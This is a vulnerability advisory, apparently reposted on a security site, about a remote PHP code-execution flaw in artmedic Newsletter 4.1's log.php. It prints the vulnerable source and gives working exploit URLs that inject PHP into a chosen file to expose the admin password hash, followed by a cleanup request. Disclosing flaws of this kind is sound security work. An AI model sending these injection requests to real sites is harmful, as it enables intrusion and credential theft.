Remote Code Execution in artmedic Newsletter 4.1 [log.php]

2006-05-26 / 2006-05-27
Credit: C.Schmitz
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

I found a bug in artmedic Newsletter 4.1 (proably even in newer versions) which lets an attacker run arbitrary php-code and bypass the password protection. The reason for this is mistake in design. log.php: <?php $time = time(); $date = date("d.m.Y, H:i:s"); $remote = getenv("REMOTE_ADDR"); $ip = getHostByAddr($remote); $logd = "$time"."&&"."$date"."&&"."$remote"."&&"."$ip"."&&"."$email"."&&n"; $logdaten = fopen("$logfile", "a+"); flock($logdaten,2); fputs($logdaten, $logd); flock($logdaten,3); fclose($logdaten); //Log-Daten nach Vorhaltezeit lschen //Delete old logdata $ablaufzeit = "$time"-"$logtime"; $pruefung = @file($logfile); while (list ($line_num, $line) = @each ($pruefung)) { $zeiten = explode("&&",$line); if($zeiten[0] <= $ablaufzeit) { $fp = fopen( "$logfile", "r" ); $contents = fread($fp, filesize($daten)); fclose($fp); $line=quotemeta($line); $string2 = ""; $replace = ereg_replace($line, $string2, $contents); $fh=fopen($logfile, "w+"); @flock($fp,2); fputs($fh, $replace); @flock($fp,3); fclose($fh); }} ?> Usually the log.php is included and $logfile,$logtime and $email are declared in the parent document. If we run "log.php?logfile=anyfile.anyext&logtime=unixtimestamp>0&email=<-- insert php code here -->" we get a file anyfile.anyext with following content: <html> ... unixtimestamp&&date&&user.host&&user.ip&&<-- php code -->&& ... </html> a simple example to reveal the admin pw Hash is log.php?logfile=info.php&logtime=000060&email=<?%20require($cur);%20echo %20$password%20?> just launch info.php?cur=include.php and you will see it. to kill the entry type: "log.php?logfile=info.php&logtime=000000" vendor has not yet been informed, but he will be as soon as possible ... regards C.Schmitz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top